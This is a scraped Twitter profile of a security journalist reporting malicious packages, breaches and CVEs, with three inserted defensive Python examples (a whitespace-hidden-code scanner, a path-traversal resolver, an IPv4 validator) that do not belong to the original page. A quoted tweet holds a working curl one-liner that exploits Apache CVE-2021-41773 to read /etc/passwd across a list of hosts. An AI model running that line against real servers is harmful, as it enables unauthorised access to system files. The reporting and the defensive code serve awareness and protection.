Ax Sharma

@Ax_Sharma

Followers
5,462
Following
1,417
Media
586
Statuses
3,535

Infosec Researcher, Journalist | 📰 Bylines + seen on 📸 BBC, BleepingComputer, Channel 5, WaPo, TechCrunch, WIRED | Member @The_BAJ @CAJ | ✉️ Tips? ax @hey .ax

🇬🇧 when not 🇮🇳🇨🇦
Joined April 2016
@Ax_Sharma
Ax Sharma
5 months
A GitHub flaw lets attackers upload executables that appear to be hosted on a company's official repo, such as Microsoft's—without the repo owner knowing anything about it. The following URLs, for example, make it seem like these ZIPs are present on Microsoft's source code repo:
Tweet media one
Tweet media two
55
1K
5K
@Ax_Sharma
Ax Sharma
4 months
A threat actor is now advising StackOverflow devs seeking debugging help to install a 'pytoileur' #Python package as a "solution" to their code troubles. 🛑DO NOT fall for this, it's a trap—the package has encoded code hidden on line 17 via whitespaces and infects Windows users
Tweet media one
Tweet media two
Tweet media three
Tweet media four
18
261
1K
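The hiding technique this post describes (real code pushed far off-screen on one line behind a long run of blanks) is easy to catch mechanically. The scanner below is an added example and is not code from the post or from the package it discusses; the sample setup.py is constructed here so that the suspicious line lands on line 17, and the 40-blank threshold, the `Finding` type and the `SUSPICIOUS_CALLS` list are my own choices.

```python
"""Flag source lines that hide code behind a long run of whitespace (constructed example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Tokens whose presence in the hidden tail raises severity (assumed list, not exhaustive).
SUSPICIOUS_CALLS = ("exec(", "eval(", "__import__(", "base64", "compile(")


@dataclass
class Finding:
    line_no: int      # 1-based line number in the scanned file
    gap_len: int      # number of consecutive blanks that precede the hidden tail
    hidden: str       # first 60 characters of what sits after the gap
    dangerous: bool   # True if the tail contains a SUSPICIOUS_CALLS token


def scan_source(text: str, min_gap: int = 40) -> list[Finding]:
    """Return one Finding per line where >= min_gap blanks are followed by more code.

    Leading indentation is stripped first, so normal block indentation never
    triggers; trailing whitespace never triggers either because the pattern
    requires a non-blank character after the gap.
    """
    gap = re.compile(r"[ \t]{%d,}(?=\S)" % min_gap)
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        body = line.lstrip()
        match = gap.search(body)
        if match is None:
            continue
        tail = body[match.end():]
        findings.append(
            Finding(
                line_no=line_no,
                gap_len=match.end() - match.start(),
                hidden=tail[:60],
                dangerous=any(token in tail for token in SUSPICIOUS_CALLS),
            )
        )
    return findings


# Constructed sample: 16 harmless lines, then a line-17 that looks like an
# ordinary setup() call in an editor but carries an exec() 300 blanks to the right.
SAMPLE_SETUP_PY = "\n".join(
    ["from setuptools import setup"]
    + [f"# constructed filler line {i}" for i in range(2, 17)]
    + [
        "setup(name='constructed-example', version='0.0.1')"
        + " " * 300
        + "exec(\"print('constructed placeholder, nothing real runs here')\")"
    ]
    + ["# end of constructed sample"]
)


def main() -> None:
    for f in scan_source(SAMPLE_SETUP_PY):
        level = "DANGEROUS" if f.dangerous else "suspicious"
        print(f"line {f.line_no}: {level}, {f.gap_len} blanks then: {f.hidden!r}")


if __name__ == "__main__":
    main()
```

Run this over every `.py` file in a package before installing it; a single hit with `dangerous=True` is enough reason to stop and read the file in an editor with whitespace rendering turned on.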
@Ax_Sharma
Ax Sharma
2 years
EXCLUSIVE: #Okta says its GitHub source code repositories were stolen this December in a 'confidential' security notification sent to 'security contacts' that include IT managers at various organizations.
Tweet media one
13
223
672
@Ax_Sharma
Ax Sharma
3 years
🚨 Apache has disclosed an *actively exploited* Path traversal flaw in the #opensource "httpd" server. Over 112,000 exposed Apache servers run version 2.4.49, and should be upgraded now! New fix checks for encoded path traversal characters e.g. /../.%2E/
Tweet media one
Tweet media two
11
337
564
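The post's point is that a check for the literal string `..` is not enough once a dot is percent-encoded as `%2E`. Below is an added example, not Apache's code and not from the post, of the defensive order of operations: decode until the string is stable, normalize, then confirm the result still lies under the document root. The document root, the helper names and the request strings are constructed for the example.

```python
"""Resolve a request path safely against a document root (constructed example)."""
from __future__ import annotations

import posixpath
from urllib.parse import unquote


def naive_has_dotdot(request_path: str) -> bool:
    """The insufficient check: looks for '..' in the raw, still-encoded path."""
    return ".." in request_path


def fully_decode(request_path: str, max_rounds: int = 3) -> str | None:
    """Percent-decode until the string stops changing.

    Repeating the decode step also covers doubly-encoded sequences such as
    '%252e'. A path that is still changing after max_rounds rounds is nested
    far beyond anything a legitimate client sends, so it is rejected outright.
    """
    current = request_path
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            return decoded
        current = decoded
    return None


def resolve_under_root(doc_root: str, request_path: str) -> str | None:
    """Return the filesystem path for request_path, or None if it escapes doc_root.

    Pure string logic on POSIX paths: it does not follow symlinks, so a real
    server still needs realpath() on the final result before opening the file.
    """
    root = posixpath.normpath(doc_root)
    decoded = fully_decode(request_path)
    if decoded is None or "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Every legitimate result is either the root itself or something inside it.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed requests: the encoded traversal form quoted in the post, a
# doubly-encoded variant, and two benign paths.
SAMPLE_REQUESTS = [
    "/cgi-bin/.%2e/%2e%2e/etc/passwd",
    "/cgi-bin/.%252e/%252e%252e/etc/passwd",
    "/images/logo.png",
    "/a/../b.txt",
]


def main() -> None:
    for req in SAMPLE_REQUESTS:
        print(f"{req:45} naive_dotdot={naive_has_dotdot(req)!s:5} "
              f"resolved={resolve_under_root('/var/www/html', req)}")


if __name__ == "__main__":
    main()
```

The first sample request passes the naive substring check (no literal `..` in the raw string) and is only rejected once decoding is done before the comparison, which is exactly the gap the post says the new httpd fix closes.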
@Ax_Sharma
Ax Sharma
3 years
Uber won't fix the vulnerability that lets anyone email as "Uber"—this isn't a spoofed email but sent from Uber via an exposed endpoint. Researcher @0x21SAFE states threat actors could abuse this to phish 57 million victims of the 2016 Uber data breach.
Tweet media one
Tweet media two
Tweet media three
16
160
553
@Ax_Sharma
Ax Sharma
3 years
Anonymous altered the official knowledgebase of Epik after the alt-right web hosting provider denied that any breach had occurred. Epik has provided services for the Texas GOP, 8chan, Parler, and Gab, among others. #EpikFail
Tweet media one
Tweet media two
13
173
538
@Ax_Sharma
Ax Sharma
3 years
EXCLUSIVE: Newly discovered #Azure flaw lets attackers brute-force Active Directory credentials in an undetected manner. At this time, there's no way to easily block the endpoints used by Seamless SSO. #Microsoft seems to consider this a "design" choice.
20
322
562
@Ax_Sharma
Ax Sharma
5 months
GitHub calls these "anonymized URLs" but I'm not sure if that's accurate—considering they appear to be associated with a repo. By contrast, Discord CDN URLs to "attachments" are truly anonymized and look like: https://cdn.discordapp[.]com/attachments/XXXXX/XXXX/virus.exe
Tweet media one
4
27
522
@Ax_Sharma
Ax Sharma
1 year
BREAKING: eFile[.]com, an IRS-authorized U.S. tax return software provider, was caught serving #JavaScript malware for weeks—as early as March 17th, and up until at least April 1st. h/t @malwrhunterteam @johullrich
Tweet media one
Tweet media two
9
143
329
@Ax_Sharma
Ax Sharma
2 years
PyTorch reveals malicious dependency chain compromise between Dec 25th & 30th. The counterfeit 'tortchtrion' stole SSH keys, first 1000 files in $HOME, .gitconfig and other secrets. 2,300+ downloads seen so far on PyPI. Uninstall now 👇👇👇 #opensource
5
140
277
@Ax_Sharma
Ax Sharma
3 years
BREAKING: #PHP Git server is the latest victim of a software supply chain attack in which attackers planted a remote code execution #backdoor in the PHP source code. PHP powers almost 8 out of 10 sites on the internet, making this upstream attack noteworthy. #opensource #git
Tweet media one
@BleepinComputer
BleepingComputer
3 years
PHP's Git server hacked to add backdoors to PHP source code - @Ax_Sharma
15
514
840
3
200
227
@Ax_Sharma
Ax Sharma
1 year
CVE-2023-29218 👀 Twitter Recommendation Algorithm... allows attackers to cause a denial of service (reduction of reputation score) by arranging for multiple Twitter accounts to coordinate negative signals regarding a target account, such as unfollowing, muting, blocking,...
8
68
213
@Ax_Sharma
Ax Sharma
4 months
Package is part of a wider ("Cool package") campaign infiltrating Python registries like PyPI since 2023. Multiple such similar typosquatting packages contain hidden obfuscated or encoded code, designed to drop persistent Windows malware as soon as these are installed.
2
12
204
@Ax_Sharma
Ax Sharma
4 years
BREAKING: UN #DataBreach exposed over 100,000 employee records and travel history due to publicly accessible '.git' directories and credential files. "Threat actors likely already have the data," state researchers @Kirtaner @johnjhacking @JacksonHHax @nicksahler
@BleepinComputer
BleepingComputer
4 years
United Nations data breach exposed over 100k UNEP staff records - @Ax_Sharma
2
131
197
2
35
194
@Ax_Sharma
Ax Sharma
3 years
#Golang , #Rustlang "net" library is impacted by the severe IP address validation vulnerability previously found in Netmask. Over 4 million results for "import net" on GitHub. Kubernetes also cherry-picked the fix. CVE-2021-29922 & CVE-2021-29923👇👇👇
Tweet media one
Tweet media two
Tweet media three
4
79
188
@Ax_Sharma
Ax Sharma
3 years
EXCLUSIVE: Ringleader of a massive fake news empire, 'Hacker X' comes out. Through extensive efforts, he created an untraceable webring of HUNDREDS of 'news' sites to spread conspiracy theories, propaganda to tip the 2016 US Election in Trump's favor.
14
96
160
@Ax_Sharma
Ax Sharma
3 years
2022 starts with Y2K22 bug: Emails getting stuck in Microsoft Exchange on-prem servers... 🤯 The cause? The FIP-FS malware scanning service that uses signed 'int32' format and can't fit '2022' 🥵💣 Here's a temporary workaround until MS releases a fix
@BleepinComputer
BleepingComputer
3 years
Microsoft Exchange '2022' FIP-FS bug causes emails to get stuck - @LawrenceAbrams
8
118
218
7
65
166
@Ax_Sharma
Ax Sharma
3 years
🇨🇦 Canada's major banks: RBC, CIBC, Scotiabank, TD Bank, BMO all affected by a mysterious, hours-long outage. Customers report e-transfers getting auto-rejected, access issues with online and mobile banking, and being stuck at grocery store checkouts.
13
87
136
@Ax_Sharma
Ax Sharma
3 years
An exposed #GitHub repo leaked personal info of some Adafruit users on or before 2019: * names * email addresses * street addresses * order details Real data seems to have been used for a training data set that got committed to a public repo. #DataLeak
Tweet media one
7
38
128
@Ax_Sharma
Ax Sharma
3 years
Northern Ireland has temporarily suspended its COVID "vaccine passport" certification service following a data leak—some users seeing data of other users. The incident has been reported to UK's IPO. Not all users are impacted 👇👇👇 #databreach #dataleak
Tweet media one
Tweet media two
7
64
107
@Ax_Sharma
Ax Sharma
3 years
Phishing actors are targeting verified Twitter users as Twitter has been relentlessly removing blue badges from "incorrectly verified" accounts this week:
Tweet media one
Tweet media two
2
29
103
@Ax_Sharma
Ax Sharma
3 years
Turns out "netmask" has had yet another bug fix made in version 2.0.1 on #npm for the critical IP address validation #vulnerability as fixes for CVE-2021-28918 were deemed incomplete. This was spotted by @ryotkak and a newer CVE-2021-29418 has now been assigned. #opensource
Tweet media one
Tweet media two
2
20
97
@Ax_Sharma
Ax Sharma
2 years
So... turns out critical Apache Struts RCE #vulnerability (via OGNL Injection) of 2020 wasn't ...quite fully fixed. Meet CVE-2021-31805—reviving CVE-2020-17530 that's rated a 9.8/Critical. Upgrade to Struts 2.5.30 or above before it's late: #opensource
0
35
84
@Ax_Sharma
Ax Sharma
3 years
One of the largest Vietnamese crypto trading apps, ONUS suffered a #Log4J hack, followed by a $5 million extortion demand. After ONUS refused to pay the ransom, threat actors put up 2 million customer records, databases, & ID/passport images up for sale.
Tweet media one
Tweet media two
4
39
82
@Ax_Sharma
Ax Sharma
2 years
@shukla_tarun @IndiGo6E @TurkishAirlines More power to the crew! They let this obnoxious, self-entitled man off too easy. So wish law enforcement was called to greet the 'unruly passenger' on landing. Baffling.
3
0
69
@Ax_Sharma
Ax Sharma
2 years
From fake #TikTok livestreams, to Midjourney being abused to make AI art — in this in-depth investigation, @Hannah_Gelbart & I delve into all the tricks scammers are playing to exploit the ecological disaster in #Turkey and Syria to steal your donations.
3
42
73
@Ax_Sharma
Ax Sharma
3 years
#npm malware stealing Chrome passwords with a real password recovery tool disguised as "TeamViewer.exe" was itself amusing enough. It just gets better when #malware author has a dump of their own plaintext passwords exposed🙃 Research by @ReversingLabs . #opensource #SupplyChain
Tweet media one
Tweet media two
2
26
65
@Ax_Sharma
Ax Sharma
2 years
EXCLUSIVE: A vulnerability (CVE) advisory from MITRE accidentally exposed over a dozen vulnerable systems—since at least April 2022.
Tweet media one
4
16
64
@Ax_Sharma
Ax Sharma
3 years
HaveIBeenPwned is alerting over 15 million users, including non-Epik customers who are impacted by the data breach. Epik's multi-gig dump leaked by Anonymous also includes a 16 GB SQL database of scraped WHOIS records. #EpikFail #databreach
1
36
51
@Ax_Sharma
Ax Sharma
3 years
BREAKING: A secret terrorist watchlist with 2 million "no-fly" records was exposed online, accessible without a password. Insecure Elasticsearch server was indexed by Censys. Taken offline 3 weeks after @MayhemDayOne notified DHS. #dataleak #databreach
2
29
51
@Ax_Sharma
Ax Sharma
3 years
Researcher refuses Telegram’s #BugBounty reward over the terms of agreement, and discloses the flaw with "self-destruct" feature that took months to resolve.
Tweet media one
Tweet media two
1
4
50
@Ax_Sharma
Ax Sharma
2 years
"Upon investigation, we have concluded that such access was used to copy Okta code repositories," writes David Bradbury, the company's Chief Security Officer (CSO) in the email.
1
14
42
@Ax_Sharma
Ax Sharma
2 years
Kubernetes 1.24 coming out later today will be the first release to officially use #Sigstore —enabling seamless signature verification to protect against supply chain attacks across the 5.6M developer community, explains @lorenc_dan of @chainguard_dev
0
15
45
@Ax_Sharma
Ax Sharma
5 months
Another neat GitHub trick. The following URL makes it look like both the commit and the .txt file are from the google/leveldb repo—but they are not: https://raw.githubusercontent[.]com/google/leveldb/2286a0cedd18b65255e7e54dc18630972420b7d6/test-file.txt
Tweet media one
2
9
43
@Ax_Sharma
Ax Sharma
3 years
BREAKING: Atlassian is asking enterprise Jira Data Center customers to patch this critical #RCE . Deserialization #vulnerability stems from unrestricted access to ports 40001 and 40011 in an Ehcache RMI network service, that remote attackers can exploit.
Tweet media one
2
21
41
@Ax_Sharma
Ax Sharma
2 years
Russia-based dev Yaffle altered 'event-source-polyfill' #npm package in March to show anti-war messages to Russians, as a peaceful protest. This marks the THIRD major #opensource self-sabotage of 2022: npm package is downloaded 600K weekly and used by 135,000+ GitHub repos.
Tweet media one
3
20
41
@Ax_Sharma
Ax Sharma
2 years
1. 35k code hits, not repos. 2. 13k of these results are from just one (relatively unimportant) repo. 3. Rest of the repos are clones of projects, not original projects hijacked. Impact is far smaller than what is hyped here. Granted, still a spammy mess for GitHub to clean up.
2
17
41
@Ax_Sharma
Ax Sharma
2 years
Gmail just went down. #GmailDown
Tweet media one
5
6
39
@Ax_Sharma
Ax Sharma
3 years
⚠️ Just because a library name itself contains a higher version number doesn't mean it's the newer or legit version of an official lib. 'colors-2.0', colors-3.0'... that keep surfacing on #npm have nothing to do with 'colors' but pack malware #Opensource
Tweet media one
Tweet media two
4
18
41
@Ax_Sharma
Ax Sharma
2 years
Too much chatter about an *unconfirmed* RCE in Spring Core — based on 1 minor commit that deprecates Java deserialization in one of the classes. Spring Core dev @Sam_Brannen confirms this is NOT a flaw, but a mere warning to anyone practicing untrusted deserialization.
Tweet media one
2
15
40
@Ax_Sharma
Ax Sharma
3 years
BREAKING: Turns out Python 3.x standard library "ipaddress" also has the octal IP address parsing #vulnerability that had previously impacted "netmask" Introduced due to a 2019 regression bug Credit: @sickcodes @koroeskohr @johnjhacking @kaoudis @tensor_bodega , et al #opensource
Tweet media one
@BleepinComputer
BleepingComputer
3 years
Python also impacted by critical IP address validation vulnerability - @Ax_Sharma
1
80
150
1
21
38
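This post, together with the earlier ones on Go/Rust "net" and the npm "netmask" fix, describes one bug class: two parsers accept the same IPv4 string but disagree on the address it denotes, so an allow- or deny-list applied by one of them is bypassed by the other. The code below is an added example and not from any of those projects: it emulates the permissive dotted-quad grammar (leading `0` means octal, `0x` means hex) beside the plain-decimal reading, reports where they diverge, and shows the strict validator a defender should use instead. The function names and sample strings are constructed here.

```python
"""Ambiguous IPv4 strings: permissive vs. plain-decimal grammars, and a strict gate."""
from __future__ import annotations

import ipaddress
import re

# Canonical field: '0' or a non-zero-leading decimal of up to three digits.
STRICT_OCTET = re.compile(r"^(0|[1-9][0-9]{0,2})$")


def lenient_octets(text: str) -> list[int] | None:
    """Emulate the classic permissive grammar: '0x..' is hex, leading '0' is octal."""
    parts = text.split(".")
    if len(parts) != 4:
        return None
    values = []
    for part in parts:
        if not part:
            return None
        try:
            if part.lower().startswith("0x"):
                value = int(part[2:], 16)
            elif len(part) > 1 and part.startswith("0"):
                value = int(part, 8)
            else:
                value = int(part, 10)
        except ValueError:
            return None
        if not 0 <= value <= 255:
            return None
        values.append(value)
    return values


def naive_octets(text: str) -> list[int] | None:
    """The other reading: every field is decimal and leading zeros carry no meaning."""
    parts = text.split(".")
    if len(parts) != 4 or not all(p.isascii() and p.isdigit() for p in parts):
        return None
    values = [int(p, 10) for p in parts]
    return values if all(0 <= v <= 255 for v in values) else None


def is_ambiguous(text: str) -> bool:
    """True when both grammars accept the string but yield different addresses."""
    lenient, naive = lenient_octets(text), naive_octets(text)
    return lenient is not None and naive is not None and lenient != naive


def strict_ipv4(text: str) -> ipaddress.IPv4Address | None:
    """Accept only canonical dotted-decimal; reject anything a parser could read two ways."""
    parts = text.split(".")
    if len(parts) != 4 or not all(STRICT_OCTET.match(p) for p in parts):
        return None
    octets = [int(p) for p in parts]
    if any(o > 255 for o in octets):
        return None
    return ipaddress.IPv4Address(".".join(str(o) for o in octets))


# Constructed inputs: the first three are the kind of strings that slip past a
# loopback/private-range deny list when the list and the socket layer disagree.
SAMPLE_INPUTS = ["0127.0.0.1", "010.0.0.1", "0x7f.0.0.1", "127.0.0.01", "127.0.0.1"]


def main() -> None:
    for text in SAMPLE_INPUTS:
        print(f"{text:12} lenient={lenient_octets(text)} naive={naive_octets(text)} "
              f"ambiguous={is_ambiguous(text)} strict={strict_ipv4(text)}")


if __name__ == "__main__":
    main()
```

Use `strict_ipv4` at the trust boundary (before any range check) and pass only its canonical string onward; `is_ambiguous` is useful in tests and log review for spotting inputs that were meant to exploit the mismatch.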
@Ax_Sharma
Ax Sharma
3 months
Solid work by @zzwudev @mdmck10 @malwrhunterteam reveals 1 operator behind all 4 domains, Polyfill, BootCDN, Bootcss and Staticfile involved in a supply chain attack that is now believed to have impacted anywhere from 100K to "tens of millions" of sites.
2
12
38
@Ax_Sharma
Ax Sharma
3 years
@0x21SAFE Apparently, not the first time either that this was reported...
@wld_basha
Soufiane el habti
3 years
@BleepinComputer @Ax_Sharma Hey mate! I reported the same vulnerability back in March 2021 and they closed it as informative, and I didn't start crying like a baby.
Tweet media one
2
0
12
1
4
34
@Ax_Sharma
Ax Sharma
3 years
In her book "Manipulated," former White House CIO @TrackerPayton describes 'Hacker X' in detail, but it is the first time he's being publicly named. Special thanks to @packmatt73 , Theresa Payton, and many sources who helped fact-check the story.
4
13
34
@Ax_Sharma
Ax Sharma
3 years
NEW: Heavily obfuscated #Python #malware caught on #opensource PyPI repo. It pulls now-deleted GitHub scripts to mine cryptocurrency on your computer. Although deleted, some of the Bash scripts could be recovered after some searching: via @sonatype
Tweet media one
Tweet media two
0
28
34
@Ax_Sharma
Ax Sharma
1 year
Reddit users spotted the issue as early as March 17th when they noticed an SSL error message thrown by eFile[.]com which appeared to be fake.
Tweet media one
1
5
35
@Ax_Sharma
Ax Sharma
2 years
💩 Sh*t gifting website ShitExpress hacked exposing customer email addresses, orders, and HYSTERICAL personalized messages customers had sent with their "gifts." The hacker posted the #dataleak on a forum:
Tweet media one
0
14
35
@Ax_Sharma
Ax Sharma
2 years
Python package 'onyxproxy' is an info-stealer using Unicode homoglyphs to evade detection. A real-world example of Trojan Source attack vector used in #opensource malware. Discovery by @Phylum_IO Reporting by @BillToulas
Tweet media one
0
14
33
@Ax_Sharma
Ax Sharma
2 years
RubyInstaller[.]org's Wikis poisoned since Nov 29th, 2022 with links to malware and IP tracing/logging site, IPlogger. Malware ZIP: e811cea654c10c0efe2618bf9d20e60c15497e8207cf5d8096aa75bab1e28573 #opensource
Tweet media one
Tweet media two
2
16
34
@Ax_Sharma
Ax Sharma
2 years
TELUS, Canada's second-largest telco, is investigating a potential #databreach after sample sets of company's employee data, payroll records, and private GitHub repos appeared on a data breach forum this week.
4
14
32
@Ax_Sharma
Ax Sharma
1 year
Why a #Doge in place of Twitter logo? 🤦‍♂️🤦‍♂️🤦‍♂️🤦‍♂️🤦‍♂️
Tweet media one
7
3
31
@Ax_Sharma
Ax Sharma
4 years
BREAKING: Researcher @alxbrsn hacked Microsoft, Apple, Tesla, Uber, Netflix, more in a novel #opensource software supply chain attack via dependency hijacking. But @sonatype 's automated #malware detection system has been a step ahead, learn how:
3
22
30
@Ax_Sharma
Ax Sharma
2 years
Kinda cool. npm package 'speedy-ts-compiler' downloads another package which is empty... but the code simultaneously and elegantly obtains your username via 'npm get cache' and exfiltrates it. PoC research by @Ajay_Kulal #OpenSource
Tweet media one
Tweet media two
0
9
30
@Ax_Sharma
Ax Sharma
3 years
His team created several Facebook groups appealing to the Trump voter base where these "news" articles were shared, boosting the sites' 3 million monthly readership to 30 million. Articles generated by 'Hacker X' were retweeted by prominent personalities and unwary voters alike.
1
9
27
@Ax_Sharma
Ax Sharma
3 years
Over 21,000 U.S. driver licenses are up for sale on a hacker forum, along with credit reports. Forum post spotted by @UnderTheBreach . The seller says they have managed to charge $400 for every 10k copies. #databreach
Tweet media one
Tweet media two
2
10
24
@Ax_Sharma
Ax Sharma
3 years
New "Stark for Chrome" extension allows developers to bake accessibility into products and bridge the #disability divide. Extension: More info:
Tweet media one
Tweet media two
3
5
30
@Ax_Sharma
Ax Sharma
3 years
The '2FA Authenticator' Android app with 10,000+ installs on Google Play did provide real MFA functionality but... ran a hidden 'UpdateService' to download a malicious APK from domain: ⚠️ privacyandroidapp[.]club
Tweet media one
Tweet media two
Tweet media three
1
9
26
@Ax_Sharma
Ax Sharma
3 years
PoC exploit now out for Azure Active Directory brute forcing flaw. Microsoft maintains it's not a vulnerability but appears to be working on a solution. Includes additional commentary from @DrAzureAD @Secureworks . 👇👇👇
1
10
28
@Ax_Sharma
Ax Sharma
3 years
#GitHub Actions abused to run #CryptoMining #malware automatically on #GitHub servers. * Needs no action from the project maintainer * Seen targeting at least 95 #opensource repos * Runs mislabeled "npm.exe" with attacker's wallet address Discovered by @JustinPerdok
Tweet media one
Tweet media two
@BleepinComputer
BleepingComputer
3 years
GitHub Actions is being abused to mine cryptocurrency on GitHub servers in an automated attack. Attack requires no action by the targeted project that is forked. Cryptominer executes as soon as the Pull Request is filed. - @Ax_Sharma
5
114
224
1
19
29
@Ax_Sharma
Ax Sharma
5 years
Popular hacking mag Hacker Noon resolves stored XSS #security #vulnerability which could let clever hackers steal user data via SVG profile avatars. An AxDB Exclusive: #cybersecurity #infosec #javascript #privacy #hacking #xss #security #hackernoon
0
31
29
@Ax_Sharma
Ax Sharma
3 years
"Tracked as CVE-2021-41773, the vulnerability is the result of an incomplete path normalization logic implemented in the Apache HTTP server 2.4.49 that in turn introduced a vulnerability."
1
1
27
@Ax_Sharma
Ax Sharma
3 years
BREAKING: A major #BGP leak last night impacted over 20,000 ASNs/networks around the world. According to @kentikinc , some U.S. companies were also affected. Analysis by @DougMadory @anurag_bhatia #outage #networksecurity #securitynews #infosec
Tweet media one
1
15
27
@Ax_Sharma
Ax Sharma
2 years
⚠️ Dish Network 📡 OUTAGE: Websites and Dish Anywhere app down for days with no explanation. Employees seem to be clueless too. cc @DISHNews @Dish
Tweet media one
Tweet media two
9
14
26
@Ax_Sharma
Ax Sharma
3 years
"Why aren’t we sending an email to every user? We evaluated the risk and consulted with our privacy lawyers and legal experts, and took the approach that... mitigated any issues while being open and transparent and did not believe emailing directly was helpful in this case."
4
2
27
@Ax_Sharma
Ax Sharma
3 years
BTW, "are" is a legitimate PyPI package from @andreilapets -- the researchers meant "aryi" (now removed). Luckily, caught this while writing my report.
@Ax_Sharma
Ax Sharma
3 years
8 malicious PyPI packages w/ 30,000 downloads found by @jfrog can: * Steal credit card numbers stored in web browsers * Steal Discord tokens and sensitive info * Perform recon. (gather screenshots/files and upload em to Discord webhook) #Python #malware
Tweet media one
Tweet media two
Tweet media three
0
11
21
0
12
24
@Ax_Sharma
Ax Sharma
1 year
The tainted 'popper.js' file, loaded on almost every eFile[.]com page, contains a base64-encoded one-liner further loading malicious JS from another domain:
Tweet media one
1
2
26
@Ax_Sharma
Ax Sharma
3 years
Popular GitHub project 'qr.js' used by QR code apps got hit with a "repo hijack." Although NPM version of 'qr.js' is safe for now, devs including a Facebook engineer are seeking #opensource alternatives to this heavily used #JavaScript QR code encoder.
Tweet media one
Tweet media two
Tweet media three
0
12
23
@Ax_Sharma
Ax Sharma
2 years
Despite stealing Okta's source code, attackers did not gain unauthorized access to the Okta service or customer data, says the company. "HIPAA, FedRAMP or DoD customers" remain unaffected and no customer action is needed.
2
2
24
@Ax_Sharma
Ax Sharma
3 years
...And it gets a PoC
@HackerGautam
Dr. Rohit Gautam
3 years
CVE-2021-41773 POC 🔥👇 ✅ One Liner : cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
10
392
983
1
0
26
@Ax_Sharma
Ax Sharma
3 years
Community does not seem pleased🍿🔥
Tweet media one
3
1
26
@Ax_Sharma
Ax Sharma
1 year
And, they were right. The 'update.js' file eventually loaded by the malicious code contains base64 string which is HTML code with this very SSL error message, as analyzed by @BleepinComputer .
Tweet media one
Tweet media two
1
2
25
@Ax_Sharma
Ax Sharma
3 years
Dark web marketplace CanadianHQ 🇨🇦 shut down by CRTC. The site's patrons traded illicit goods and services including stolen credit card numbers, and illegal drugs. Images via @DarkDotFail
Tweet media one
Tweet media two
Tweet media three
3
13
24
@Ax_Sharma
Ax Sharma
2 years
Malicious PyMafka package drops Cobalt Strike on Windows, macOS and appears to typosquat #opensource PyKafka, Apache Kafka client for Python. #malware
Tweet media one
Tweet media two
1
16
24
@Ax_Sharma
Ax Sharma
2 years
@llkkaT @hans_dam 🍿 Severity of CVE-2022-22963—SpEL Injection in Spring Cloud Function was bumped up from a Medium to CRITICAL just now 👀 h/t @wayfaring_life cc @LawrenceAbrams @wdormann
Tweet media one
Tweet media two
3
17
25
@Ax_Sharma
Ax Sharma
3 years
Although this may have started out as a peaceful "non-destructive" protest by the developer with 'peacenotwar' module, the addition of blatantly destructive payload to 'node-ipc' raised serious concerns in the community ⚠️ given the dev also maintains ~40 popular npm packages.
Tweet media one
1
2
24
@Ax_Sharma
Ax Sharma
1 year
The malicious JavaScript file 'update.js', further attempts to prompt users to download next stage payload, depending on whether they are using Chrome [update.exe] or Firefox [installer.exe].
Tweet media one
Tweet media two
1
4
22
@Ax_Sharma
Ax Sharma
3 years
And, it gets worse. PoC exploits for CVE-2021-41773 reveal it can evolve into full-on Remote Code Execution (RCE) on both Linux and Windows servers. h/t @hackerfantastic @wdormann @timb_machine
@BleepinComputer
BleepingComputer
3 years
Actively exploited Apache 0-day also allows remote code execution - @Ax_Sharma
1
114
183
3
16
22
@Ax_Sharma
Ax Sharma
3 years
8 malicious PyPI packages w/ 30,000 downloads found by @jfrog can: * Steal credit card numbers stored in web browsers * Steal Discord tokens and sensitive info * Perform recon. (gather screenshots/files and upload em to Discord webhook) #Python #malware
Tweet media one
Tweet media two
Tweet media three
0
11
21
@Ax_Sharma
Ax Sharma
3 years
Throwback Monday 😃
Tweet media one
0
0
21
@Ax_Sharma
Ax Sharma
3 years
Newer versions 11.0.0 and above released for 'node-ipc' STILL continue to contain the 'peacenotwar' module that will generate text files propounding "peace" message on the Desktops of infected users:
Tweet media one
2
2
20
@Ax_Sharma
Ax Sharma
2 years
PSA: CVE-2022-31289 is *NOT* a vulnerability or even a bug. The writeup on it was rushed without following any responsible disclosure and after half-baked "research."
@pmmali_ @HackerGautam @shifacyclewala here's the opportunity to set the record straight on your blog and reports.
7
8
24
2
7
20
@Ax_Sharma
Ax Sharma
4 years
@LucaBongiorni @ATuin @Microsoft @ubuntu By all means, call @ubuntu @Microsoft out but why publicly name the representative? Are they even aware you leaked a private msg naming them?
8
0
20
@Ax_Sharma
Ax Sharma
4 months
In addition to using drive-by downloads and trojanized 'browser updates' to spread itself, #LummaC2 crypto-stealer now targets Python developers by imitating popular cryptocurrency libraries like 'crytic-compile'. The illicit package 'crytic-compilers' drops Lumma ⚠️
Tweet media one
Tweet media two
1
1
19
@Ax_Sharma
Ax Sharma
2 years
Clop #ransomware just removed @AxisBank , India's third largest private bank roughly two days after I'd reached out to Axis.
Tweet media one
Tweet media two
Tweet media three
3
9
20
@Ax_Sharma
Ax Sharma
3 years
PyPI #malware 'botaa3' - a poor typosquatting attempt at mimicking Amazon AWS SDK for Python 'boto3'. Has XOR-encrypted code to: * Exfil. data * Give attacker C2 capabilities: upload, download, browse, delete,... * Kill itself on @sonatype #opensource
Tweet media one
Tweet media two
Tweet media three
0
4
20
@Ax_Sharma
Ax Sharma
2 years
'secretslib' PyPI package drops fileless malware to evade detection. Malicious payload injected in memory is a Monero cryptominer. Threat actor even used 'Author' info of an engineer working for a U.S. Department of Energy-funded national lab. #opensource
Tweet media one
Tweet media two
Tweet media three
1
2
20
@Ax_Sharma
Ax Sharma
2 years
Just had another (verified) Dish Network employee reach out to me confirming on background that the company has indeed been "cyber attacked." The employee received a written note from their manager stating, "it was caused by an outside bad actor, a known threat."
4
11
19
@Ax_Sharma
Ax Sharma
4 years
@AlbinatorB @Immortal_Graves @riverandmal and @breakaway71 No author, but regret looking into this. 😖 for public service, I must advise, do not click.
16
1
19
@Ax_Sharma
Ax Sharma
2 years
Proofpoint's @sherrod_im warns of over 2.8 million instances of scammers soliciting donations via fraudulent crypto wallet addresses.
Tweet media one
1
2
17
